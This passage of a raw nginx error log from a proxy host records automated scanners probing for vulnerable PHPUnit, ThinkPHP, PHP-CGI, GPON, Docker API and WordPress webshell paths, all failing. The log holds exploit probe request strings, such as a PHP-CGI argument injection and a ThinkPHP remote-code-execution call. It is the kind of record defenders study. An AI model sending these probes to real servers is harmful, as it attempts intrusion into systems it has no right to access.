"/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:26 [error] 314#314: *126778 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:26 [error] 314#314: *126778 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:28 [error] 314#314: *126778 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 14:06:33 [error] 315#315: *127868 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 14:17:53 [error] 315#315: *127875 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 134.199.146.250, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "92.249.249.197" +2026/01/15 14:17:53 [error] 315#315: *127876 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 134.199.146.250, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 14:17:54 [error] 315#315: *127877 open() "/var/www/html/t4" failed (2: No such file or directory), client: 134.199.146.250, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "92.249.249.197" +2026/01/15 14:17:54 [error] 315#315: *127878 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 134.199.146.250, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "92.249.249.197" +2026/01/15 14:17:56 [error] 314#314: *129366 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 134.199.146.250, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 14:17:56 [error] 314#314: *129367 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 134.199.146.250, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 14:17:57 [error] 314#314: *129368 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 134.199.146.250, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 14:33:08 [error] 314#314: *129400 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 14:54:29 [error] 314#314: *129404 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 15:01:43 [error] 315#315: *129406 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 15:35:16 [error] 315#315: *129415 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 15:48:17 [error] 315#315: *129418 open() "/var/www/html/logon.htm" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /logon.htm HTTP/1.1", host: "127.0.0.1" +2026/01/15 17:08:29 [error] 322#322: *129446 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 17:22:11 [error] 319#319: *129449 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:11 [error] 319#319: *129449 open() "/var/www/html/wp-content/style.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-content/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:11 [error] 319#319: *129449 open() "/var/www/html/wp-content/themes/style.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:11 [error] 319#319: *129449 open() "/var/www/html/wp-admin/style.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:12 [error] 319#319: *129449 open() "/var/www/html/wp-includes/style.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:12 [error] 319#319: *129449 open() "/var/www/html/chosen.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /chosen.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:12 [error] 319#319: *129449 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:12 [error] 319#319: *129449 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:12 [error] 319#319: *129449 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:12 [error] 319#319: *129449 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:13 [error] 319#319: *129449 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:13 [error] 319#319: *129449 open() "/var/www/html/blurbs.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /blurbs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:13 [error] 319#319: *129449 open() "/var/www/html/akcc.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /akcc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:13 [error] 319#319: *129449 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:13 [error] 319#319: *129449 open() "/var/www/html/shelp.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /shelp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:13 [error] 319#319: *129449 open() "/var/www/html/cord.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /cord.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:14 [error] 319#319: *129449 open() "/var/www/html/dex.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /dex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:14 [error] 319#319: *129449 open() "/var/www/html/wp-admin/admin-ajax.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/admin-ajax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:14 [error] 319#319: *129449 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:14 [error] 319#319: *129449 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:14 [error] 319#319: *129449 open() "/var/www/html/wp-admin/zwso.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:14 [error] 319#319: *129449 open() "/var/www/html/wp-content/plugins/hellopress/wp_mna.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:15 [error] 319#319: *129449 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:15 [error] 319#319: *129449 open() "/var/www/html/shlo.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /shlo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:15 [error] 319#319: *129449 open() "/var/www/html/133.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /133.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:15 [error] 319#319: *129449 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:15 [error] 319#319: *129449 open() "/var/www/html/php8.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /php8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:15 [error] 319#319: *129449 open() "/var/www/html/lufix1.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /lufix1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:16 [error] 319#319: *129449 open() "/var/www/html/witmm.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /witmm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:16 [error] 319#319: *129449 open() "/var/www/html/wp-admin/css/index.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:16 [error] 319#319: *129449 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:16 [error] 319#319: *129449 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:16 [error] 319#319: *129449 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:16 [error] 319#319: *129449 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:17 [error] 319#319: *129449 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:17 [error] 319#319: *129449 open() "/var/www/html/wp-editor.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-editor.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:17 [error] 319#319: *129449 open() "/var/www/html/txets.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:17 [error] 319#319: *129449 open() "/var/www/html/wp-content/txets.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-content/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:17 [error] 319#319: *129449 open() "/var/www/html/wp-admin/txets.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:17 [error] 319#319: *129449 open() "/var/www/html/postnews.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:18 [error] 319#319: *129449 open() "/var/www/html/wp-content/postnews.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-content/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:22:18 [error] 319#319: *129449 open() "/var/www/html/wp-admin/postnews.php" failed (2: No such file or directory), client: 104.28.235.59, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 17:43:58 [error] 319#319: *129473 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:19 [error] 319#319: *129482 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:19 [error] 319#319: *129482 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:20 [error] 319#319: *129482 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:21 [error] 319#319: *129482 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:22 [error] 319#319: *129482 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:23 [error] 319#319: *129482 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:23 [error] 319#319: *129482 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:24 [error] 319#319: *129482 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:25 [error] 319#319: *129482 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:25 [error] 319#319: *129482 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:26 [error] 319#319: *129482 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:26 [error] 319#319: *129482 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:26 [error] 319#319: *129482 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:27 [error] 319#319: *129482 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:27 [error] 319#319: *129482 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:28 [error] 319#319: *129482 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:28 [error] 319#319: *129482 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:29 [error] 319#319: *129482 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:30 [error] 319#319: *129482 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:30 [error] 319#319: *129482 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:30 [error] 319#319: *129482 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:30 [error] 319#319: *129482 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:31 [error] 319#319: *129482 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:31 [error] 319#319: *129482 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:32 [error] 319#319: *129482 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:32 [error] 319#319: *129482 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:32 [error] 319#319: *129482 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:33 [error] 319#319: *129482 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:33 [error] 319#319: *129482 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:33 [error] 319#319: *129482 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:34 [error] 319#319: *129482 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:34 [error] 319#319: *129482 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:34 [error] 319#319: *129482 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:34 [error] 319#319: *129482 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:35 [error] 319#319: *129482 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:35 [error] 319#319: *129482 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:36 [error] 319#319: *129482 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:36 [error] 319#319: *129482 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:36 [error] 319#319: *129482 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:37 [error] 319#319: *129482 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 17:57:37 [error] 319#319: *129482 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 115.190.29.141, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 21:21:53 [error] 319#319: *131011 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 21:26:51 [error] 319#319: *131012 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 21:44:34 [error] 319#319: *131019 open() "/var/www/html/GponForm/diag_Form" failed (2: No such file or directory), client: 103.160.197.6, server: localhost-nginx-proxy-manager, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80" +2026/01/15 23:12:08 [error] 328#328: *131031 open() "/var/www/html/s47n3xv3h40jkifl" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /s47n3xv3h40jkifl HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:08 [error] 328#328: *131032 open() "/var/www/html/s47n3xv3h40jkifl.php" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /s47n3xv3h40jkifl.php 